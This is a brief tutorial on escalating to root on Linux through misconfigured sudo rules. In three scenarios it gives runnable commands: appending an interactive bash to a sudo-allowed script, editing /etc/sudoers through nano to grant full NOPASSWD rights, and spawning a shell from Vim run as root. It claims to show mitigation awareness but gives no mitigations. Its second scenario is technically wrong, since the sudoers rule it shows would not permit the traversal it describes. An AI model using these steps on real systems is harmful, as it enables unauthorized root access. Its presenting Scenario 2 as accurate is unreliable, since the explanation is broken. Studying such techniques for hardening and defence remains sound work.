Explains how insecure configurations enable privilege escalation and demonstrates proper mitigation awareness.

# Linux Privilege Escalation Techniques

The following scenarios demonstrate common privilege escalation vectors caused by misconfigured sudo permissions.

---

## Scenario 1: Privilege Escalation Using an Executable .sh File

If a user is allowed to run a script as root without a password, such as:

```

analyst ALL=(ALL) NOPASSWD: /path/to/test.sh

```

then the script will execute with full root privileges when run through sudo.

### Steps

1. View the script:
```

cat /path/to/test.sh

```

2. Append a command to spawn a root shell:
```

echo "/bin/bash -i" >> /path/to/test.sh

```

3. Execute the script as root:
```

sudo /path/to/test.sh

```

### Result
The user obtains a root shell because the script runs under root’s context.

---

## Scenario 2: Privilege Escalation Using Restricted nano Access

If sudoers allows nano execution as root but restricts it to a specific directory, for example:

```

analyst ALL=(ALL) NOPASSWD: /var/opt/nano

```

directory traversal can be used to bypass the restriction.

### Steps

1. Access sudoers through a traversal path:
```

sudo nano /var/opt/../../etc/sudoers

```

2. Add full privileges for the user:
```

analyst ALL=(ALL) NOPASSWD:ALL

```

3. Save the file and escalate:
```

sudo -i

```

### Result
The user gains full root privileges via sudo.

---

## Scenario 3: Privilege Escalation Using Vim

If the user can run Vim as root:

```

analyst ALL=(ALL) NOPASSWD: /usr/bin/vi

```

Vim’s built-in shell escape provides immediate privilege escalation.

### Steps

1. Launch Vim as root:
```

sudo vi file.sh

```

2. Enter command mode and spawn a shell:
```

:!bash

```

Or use Vim’s command flag:

```

sudo vi -c '!bash'

```

### Result
Vim opens a root shell because the shell command executes under root’s privileges.

---